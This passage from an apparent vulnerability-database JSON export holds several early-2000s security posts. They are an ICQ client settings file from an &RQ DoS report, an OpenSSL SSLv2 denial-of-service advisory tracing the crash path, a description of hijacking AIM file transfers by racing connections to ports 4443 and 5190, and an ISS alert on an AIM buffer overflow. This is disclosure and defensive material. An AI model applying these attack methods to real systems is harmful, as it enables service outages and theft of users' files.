RdM-[YanDeX]\r\n\r\n\r\n\r\n----andrq.ini\r\nmsg-behaviour=tip(30)+tray+openchat+save+history\r\nurl-behaviour=tip(150)+tray+openchat+save+sound+history\r\ncontacts-behaviour=tray+openchat+save+sound+history\r\nfile-behaviour=tray+save+sound+history\r\nauthreq-behaviour=tray+openchat+save+sound+history\r\naddedyou-behaviour=tray+openchat+save+sound+history\r\noncoming-behaviour=tip(50)+tray+save+sound+history\r\noffgoing-behaviour=tip(50)+save+history\r\nauth-behaviour=tray+openchat+save+sound+history\r\nauthdenied-behaviour=tray+openchat+save+sound+history\r\nstatuschange-behaviour=openchat+save+history\r\nautomsgreq-behaviour=tip(70)+openchat+save+history\r\ngcard-behaviour=tray+openchat+save+sound+history\r\nautomsg-behaviour=openchat+sound+history+popup\r\nonline-disable-blinking=No\r\nonline-disable-tips=No\r\nonline-disable-sounds=No\r\noccupied-disable-blinking=No\r\noccupied-disable-tips=No\r\noccupied-disable-sounds=No\r\ndnd-disable-blinking=Yes\r\ndnd-disable-tips=No\r\ndnd-disable-sounds=Yes\r\nna-disable-blinking=No\r\nna-disable-tips=No\r\nna-disable-sounds=No\r\naway-disable-blinking=No\r\naway-disable-tips=No\r\naway-disable-sounds=No\r\nf4c-disable-blinking=No\r\nf4c-disable-tips=No\r\nf4c-disable-sounds=No\r\nauto-size=No\r\nauto-size-full=Yes\r\npublic-email=No\r\nserver-host=login.icq.com\r\nreopen-chats-on-start=Yes\r\nskip-splash=Yes\r\nfix-windows-position=Yes\r\nflash-chat-window=Yes\r\nstart-minimized=No\r\nauto-reconnect=Yes\r\nuse-last-status=Yes\r\nsingle-tray-click=No\r\nserver-port=5190\r\nlang=default\r\nclose-auth-after-reply=Yes\r\nlast-update-info=51\r\nlast-update-check-time=30/12/1899\r\ncheck-betas=Yes\r\nwheel-velocity=3\r\ninactive-hide=No\r\nget-offline-msgs=No\r\ndel-offline-msgs=No\r\nroaster-bar-on-top=No\r\ninactive-hide-time=10\r\nsend-balloon-on=2\r\nsend-balloon-on-date=30/12/1899 13.29.40\r\ndont-save-password=No\r\noncoming-on-away=No\r\nshow-client-id=Yes\r\nauto-connect=No\r\nminimize-roaster=Yes\r\nconnect-on-connection=No\r\nquit-confirmation=No\r\nmin-on-off=No\r\nmin-on-off-time=30\r\nplay-sounds=Yes\r\nlock-on-start=No\r\nok-double-enter-auto-msg=Yes\r\nauto-check-update=No\r\nshow-only-online-contacts=No\r\nshow-only-im-visible-to-contacts=No\r\nshow-oncoming-dialog=No\r\nsend-added-you=No\r\nalways-on-top=Yes\r\nchat-always-on-top=No\r\nshow-statusbar=Yes\r\nwarn-visibility-automsgreq=Yes\r\nsplit-y=62\r\nblink-speed=5\r\ntemp-blink-time=80\r\nshow-contact-tip=Yes\r\nuse-default-browser=No\r\nbrowser-command-line=C:\PROGRA~1\INTERN~1\iexplore.exe -new\r\nclose-button-hides=No\r\npopup-automsg=Yes\r\nsave-not-in-list=No\r\nanimated-roaster=Yes\r\nshow-groups=Yes\r\nvisibility-flag=Yes\r\nuse-smiles=Yes\r\nsend-on-enter=2\r\nsort-by=event\r\nshow-status-on-tabs=Yes\r\nauto-deselect=No\r\nsingle-message-by-default=No\r\nauto-copy=Yes\r\nwebaware=No\r\nauth-needed=Yes\r\nindent-contact-list=No\r\nauto-consume-events=Yes\r\nshow-disconnected-dialog=Yes\r\nitalic-mode=0\r\ndisabled-plugins=plugintest.dll;plugintest2.dll;\r\nkeep-alive=No\r\nkeep-alive-freq=1\r\nfocus-on-chat-popup=No\r\nenable-ignore-list=Yes\r\ntheme=default.theme.ini\r\nrounded-windows=Yes\r\npreferences-height=424\r\ndocking-enabled=Yes\r\ndocking-active=No\r\ndocking-resize=No\r\ndocking-right=Yes\r\ndocking-bak-x=90\r\ndocking-bak-y=7\r\ndocking-bak-width=162\r\ndocking-bak-height=230\r\nautoaway-exit=No\r\nautoaway-away=Yes\r\nautoaway-away-time=600\r\nautoaway-na=Yes\r\nautoaway-na-time=1200\r\nignore-not-in-list=No\r\nignore-pagers=No\r\nspam-ignore-not-in-list=No\r\nspam-ignore-empty-history=No\r\nspam-ignore-bad-words=No\r\nspam-ignore-multisend=No\r\nspam-bad-words=whore;xxx;sex;tits;fuck;britney;bondage;blowjobs;suonerie;webcam;movies;adult;credit\r\ncard;penis\r\nspam-warn=Yes\r\nspam-uin-greater-than=0\r\nhistory-crypt-enabled=No\r\nhistory-crypt-save-password=No\r\nchat-lsb-popup=Yes\r\nchat-lsb-show=Yes\r\nwindow-top=107\r\nwindow-height=308\r\nwindow-left=729\r\nwindow-width=137\r\nchat-top=158\r\nchat-height=384\r\nchat-left=23\r\nchat-width=517\r\nchat-maximized=No\r\ntransparency=No\r\ntransparency-chat=No\r\ntransparency-active=193\r\ntransparency-inactive=87\r\nproxy=No\r\nproxy-SOCKS5-host=\r\nproxy-SOCKS5-port=1080\r\nproxy-SOCKS4-host=\r\nproxy-SOCKS4-port=1080\r\nproxy-HTTP/S-host=\r\nproxy-HTTP/S-port=8080\r\nproxy-auth=Yes\r\nproxy-user=test\r\nproxy-proto=SOCKS5\r\nstarting-status=na\r\nstarting-visibility=privacy\r\nlog-events-file=Yes\r\nlog-events-window=Yes\r\nlog-events-clear=Yes\r\nlog-packets-file=Yes\r\nlog-packets-window=Yes\r\nlog-packets-clear=Yes\r\nfont-style-codes=Yes\r\nwrite-history=Yes\r\nquote-selected=Yes\r\nquoting-width=300\r\nquoting-cursor-below=No\r\ntexturized-windows=Yes\r\nroaster-title=%uin% %nick%\r\nauto-switch-keyboard-layout=Yes\r\nshow-roaster-minimize-button=Yes\r\nwarn-visibility-exploit=Yes\r\n---end of andrq.ini\r\n\r\n\r\n\r\n-- \r\nBest regards,\r\n RdM-[YanDeX] mailto:rdm-yandex@nnm.ru", "modified": "2004-08-22T00:00:00", "published": "2004-08-22T00:00:00", "id": "SECURITYVULNS:DOC:6645", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6645", "title": "&RQ DoS bug", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:08", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n======================================================================\r\nSecurity advisory 20031002\r\n- ----------------------------------------------------------------------\r\n Product: openssl\r\n Issue date: 2003/10/02\r\nLast updated: 2003/10/02\r\n======================================================================\r\n\r\n\r\n\r\nOpenSSL remote vulnerability\r\n============================\r\n\r\nMr. Hornik discovered remote vulnerability in OpenSSL package provided\r\nby RedHat. Because of nature of this bug some other vendors can be\r\nvulnerable too. This vulnerability is inside SSLv2 server code and\r\nallows killing remote process running OpenSSL library as SSL server,\r\nresulting in DoS.\r\n\r\nThe vulnerability is different from one found in SSLv2 OpenSSL server\r\nannounced on 2002/07/30.\r\n\r\n\r\nVulnerability\r\n- -------------\r\n\r\nBy constructing special SSLv2 CLIENT_MASTER_KEY message the following\r\nexecution path can be obtained - we are reffering to source lines from\r\nopenssl-0.9.6b-32.7.src.rpm from RH 7.3.\r\n\r\nWhen:\r\ni, negotated cipher is some export cipher, for example EXP-RC4-MD5\r\nii, length of the clear is increased for example by 64 (see below)\r\n\r\nThen this execution path happens:\r\n1, on ssl/s2_srvr.c:419 condition is_export && (s->s2->tmp.clear+i !=\r\n EVP_CIPHER_key_length(c)) becomes true because of i, and ii,\r\n2, on ssl/s2_srvr.c:424 i is "fixed", but tmp.clear stays unchanged\r\n3, on ssl/s2_srvr.c:450 because is_export is true integer variable i\r\n is increased by big enough value (ii,)\r\n4, on ssl/s2_srvr.c:451 die causes abort of the process leading to DoS\r\n\r\n\r\nWho is affected?\r\n- ----------------\r\n\r\nAffected are all RedHat distributions up to version 8.0 including.\r\nRedHat published patch on 2003/09/30 silently without issuing warning\r\nabout existence of vulnerability. RedHat announced the patch in its\r\nadvisory RHSA-2003:291-11.\r\n\r\nopenssl.org sources starting with version 0.9.6f and distribution\r\npackages based on these versions are not vulnerable, because OpenSSL\r\nstarting from 0.9.6f are avoiding using die() call because of its\r\npotential risk.\r\n\r\n\r\nRecommendations\r\n- ---------------\r\n\r\nWe recommend to upgrade openssl package to the version issued on\r\n2003/09/30 and after in all RedHat distributions up to 8.0. Until the\r\nnew version will be installed we recommend to disable SSLv2\r\nfunctionality whenever it is possible. (In Apache + mod_ssl for\r\nexample it is enabled by default and it can be disabled, please refer\r\nto mod_ssl documentation.)\r\n\r\n\r\nReferences\r\n- ----------\r\n\r\nOpenSSL project:\r\nhttp://www.openssl.org/\r\nOpenSSL vulnerability announced on 2002/07/30:\r\nhttp://www.openssl.org/news/secadv_20020730.txt\r\n\r\nThis security advisory:\r\nhttp://www.ebitech.sk/patrik/SA/SA-20031002.txt\r\n\r\n\r\nContact\r\n- -------\r\n\r\nPatrik Hornik\r\n- --\r\nSecurity Consultant\r\n\r\nEmail: patrik.hornik@ebitech.sk\r\nPhone: +421 905 385 666\r\nPGP KeyID: DFA5BC67\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.0.2i\r\n\r\niQA/AwUBP3vPZCTdn3LfpbxnEQLzGACfdijq9XR5t6xZOD5DVpppRALzx9AAn2rn\r\nYSRmV1AzKuatK5UMEJVuJDJM\r\n=ajOd\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2003-10-03T00:00:00", "published": "2003-10-03T00:00:00", "id": "SECURITYVULNS:DOC:5190", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5190", "title": "New OpenSSL remote vulnerability (issue date 2003/10/02)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "description": "\r\n\r\nAIM Remote File Transfer/Direct Connection \r\n\r\nVulnerability\r\n\r\n\r\n\r\nI Discovered this vulnerability while I was port \r\n\r\nscanning my brother(April 15th, 2002), he just \r\n\r\nhappened to send me a file and the port scan \r\n\r\nconnected and received the file instead of me... The \r\n\r\nnext day(April 16th, 2002) I made a program to exploit \r\n\r\nthe vulnerability. This is how the vulnerability works....\r\n\r\n\r\n\r\nWhen AIM gets a connection request or tries to \r\n\r\nconnect to someone else it acts as a server, the \r\n\r\nprogram I made rapidly tries to connect to the target \r\n\r\nIP(every 450 milliseconds) on port 4443(Direct \r\n\r\nConnection) and 5190(File Transfer) it then intercepts \r\n\r\nthe connection and steals whatever data the target \r\n\r\nsends, they can receive text from their "friends" but \r\n\r\nthey cannot send it because all data they send gets \r\n\r\nsent to you, I don't know the Oscar protocol, but I'm \r\n\r\nsure that if you where to use it, you could send text \r\n\r\nback to the IM as the "friend" or maybe as a fake \r\n\r\nscreen name, this could be used to trick the person \r\n\r\ninto giving you passwords or personal information, \r\n\r\neven if the person just happened to send something \r\n\r\nlike "passwords.txt" to their "friend", you now have \r\n\r\nthose passwords. \r\n\r\n\r\n\r\nThe fix:\r\n\r\nI think a fix would be simple, have AIM only connect to \r\n\r\nthe IP of the person they are trying to connect to \r\n\r\nwhich would be retrieved by the AIM server(s), I \r\n\r\nwouldn't doubt there being ways to exploit this \r\n\r\nalso..but it's a start.\r\n\r\nA temporary way to protect from the file transfer spy \r\n\r\nwould be to change the port in the AIM preferences \r\n\r\ndialog for file transfer to something other than 5190, it \r\n\r\nwould be pretty hard for someone to guess what port \r\n\r\nyou changed it to.\r\n\r\n\r\n\r\nData you could potentially "steal":\r\n\r\npictures, files, text, passwords, movies, personal \r\n\r\ninformation, etc...\r\n\r\n\r\n\r\nWell that concludes this article..., if you have any \r\n\r\nquestions or comments please feel free to contact \r\n\r\nme.\r\n\r\n\r\n\r\n(One last note: I am still fixing bugs and trying \r\n\r\ndifferent things with the program, but when I am \r\n\r\nhappy with it, I will post it on my site, it is called \r\n\r\nRAFTS which stands for Remote AIM File Transfer \r\n\r\nSpy)\r\n\r\n\r\n\r\n-Joseph Musso a.k.a. Sil\r\n\r\nwww.silenttech.com\r\n\r\naim screen name: xlsillx\r\n\r\nemail: sil@linuxquestions.net", "modified": "2002-04-23T00:00:00", "published": "2002-04-23T00:00:00", "id": "SECURITYVULNS:DOC:2829", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2829", "title": "AIM Remote File Transfer/Direct Connection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:05", "bulletinFamily": "software", "description": "Internet Security Systems Security Alert\r\nJanuary 2, 2002\r\n\r\nAOL Instant Messenger Remote Buffer Overflow\r\n\r\nSynopsis:\r\n\r\nInternet Security Systems (ISS) X-Force has learned of a remote buffer\r\noverflow vulnerability in the popular AOL Instant Messenger (AIM)\r\nsoftware. An exploit for this vulnerability has been released publicly.\r\nThis vulnerability may allow remote attackers to execute arbitrary\r\ncommands on a victim\u2019s system. The victim is unable to refuse the\r\nrequest or determine who initiated the attack.\r\n\r\nAffected Versions:\r\n\r\nAOL Instant Messenger versions 4.3 through 4.7.2480 for Windows\r\nAOL Instant Messenger version 4.8.2616 for Windows (beta)\r\n\r\nNote: AOL Instant Messenger versions prior to 4.3 have not been tested.\r\nPrevious versions that contain the Games feature may also be vulnerable.\r\n\r\nDescription:\r\n\r\nThe AOL Instant Messenger program is used by over 100 million users to\r\nsend messages, share and transfer files, talk over the Internet, check\r\nstock prices and headlines, and play games.\r\n\r\nA vulnerability exists in the code that processes game requests, which\r\nmay allow attackers to execute arbitrary code on a remote AIM user\u2019s\r\nsystem. The victim is not able to refuse the game request in order to\r\nblock the exploit. This vulnerability is relatively easy to exploit, and\r\nthe exploit can contain a large and complex payload.\r\n\r\nThis is a serious vulnerability in a very widely used software product.\r\nIf a worm like Code Red or Nimda were written to exploit this\r\nvulnerability, it would likely spread very rapidly, and could\r\npotentially damage both personal and business systems.\r\n\r\n\r\nRecommendations:\r\n\r\nISS X-Force recommends that users upgrade to the latest version of AOL\r\nInstant Messenger as soon as a fix becomes available.\r\n\r\nUntil a fixed version of AOL Instant Messenger is available, system\r\nadministrators are encouraged to block "login.oscar.aol.com" and port\r\n5190 at the firewall. This will prevent AIM users from logging in to the\r\nAIM service.\r\n\r\nISS RealSecure intrusion detection customers may use the following\r\nconnection event to detect access attempts by AOL Instant Messenger\r\nservers to AIM clients, including both normal connections and attempts\r\nto exploit this vulnerability. Follow the instructions below to apply\r\nthe connection event to your policy.\r\n\r\n1. Choose the policy that you want to use, and then click 'Customize'.\r\n2. Select the 'Connection Events' tab.\r\n3. In the right pane, click 'Add'.\r\n4. Create a Connection Event.\r\n5. Type in a name of the event, such as 'AIM_5190'.\r\n6. In the 'Response' field for the event, select the responses you want\r\n to use.\r\n In the 'Protocol' field, select TCP.\r\n In the 'Src Port/Type' field, select the entry for AOL port 5190.\r\n Click 'OK'.\r\n7. Save the changes, and then close the window.\r\n8. Click 'Apply to Sensor' or 'Apply to Engine' depending on the version\r\n of RealSecure you are using.\r\n\r\nTo reduce the risk from this vulnerability until a fixed version is\r\navailable, AOL Instant Messenger users should block unknown users from\r\ncontacting them using AIM. However, this will not provide complete\r\nprotection, because users on your Buddy List can still contact you. If\r\nthis vulnerability is built into a worm, this attack may come from users\r\non your Buddy List without their knowledge.\r\n\r\nTo block unknown users in AIM:\r\n1. Go to My AIM -> Edit Options -> Edit Preferences.\r\n2. In the left pane, select the Privacy category.\r\n3. In the "Who can contact me" section, select "Allow only users on my\r\n Buddy List".\r\n\r\nInternet Scanner X-Press Update version 6.4 will be available for\r\ndownload at the following URL on January 3, 2002:\r\nhttp://www.iss.net/db_data/xpu/IS.php\r\n\r\nISS X-Force will provide detection support for this vulnerability in an\r\nupcoming X-Press Updates for RealSecure Network Sensor. Detection\r\nsupport for this attack will also be added in a future update for\r\nBlackICE products.\r\n\r\nAdditional Information:\r\n\r\nThis vulnerability was discovered and released by w00w00.\r\n\r\n______\r\n\r\n\r\nAbout Internet Security Systems (ISS)\r\nInternet Security Systems is a leading global provider of security\r\nmanagement solutions for the Internet, protecting digital assets and\r\nensuring safe and uninterrupted e-business. With its industry-leading\r\nintrusion detection and vulnerability assessment, remote managed\r\nsecurity services, and strategic consulting and education offerings, ISS\r\nis a trusted security provider to more than 9,000 customers worldwide\r\nincluding 21 of the 25 largest U.S. commercial banks, the top 10 U.S.\r\ntelecommunications companies, and all major branches of the U.S. Federal\r\nGovernment. Founded in 1994, ISS is headquartered in Atlanta, GA, with\r\nadditional offices throughout North America and international operations\r\nin Asia, Australia, Europe, Latin America and the Middle East. For more\r\ninformation, visit the Internet Security Systems web site at www.iss.net\r\nor call 888-901-7477.\r\n\r\nCopyright (c) 2001 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nPermission is hereby granted for the redistribution of this Alert\r\nelectronically. It is not to be edited in any way without express\r\nconsent of the X-Force. If you wish to reprint the whole or any part\r\nof this Alert in any other medium excluding electronic medium, please\r\ne-mail xforce@iss.net for permission.\r\n\r\nDisclaimer\r\n\r\nThe information within this paper may change without notice. Use of\r\nthis information constitutes acceptance for use in an AS IS condition.\r\nThere are NO warranties with regard to this information. In no event\r\nshall the author be liable for any damages whatsoever arising out of or\r\nin connection with the use or spread of this information. Any use of\r\nthis information is at the user's own risk.\r\n\r\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php\r\nas well as on MIT's PGP key server and PGP.com's key server.\r\n\r\nX-Force Vulnerability and Threat Database: http://www.iss.net/xforce\r\n\r\nPlease send suggestions, updates, and comments to:\r\nX-Force xforce@iss.net of Internet Security Systems, Inc.\r\n", "modified": "2002-01-03T00:00:00", "published": "2002-01-03T00:00:00", "id": "SECURITYVULNS:DOC:2309", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:2309", "title": "ISS Security Alert: AOL Instant Messenger Remote Buffer Overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
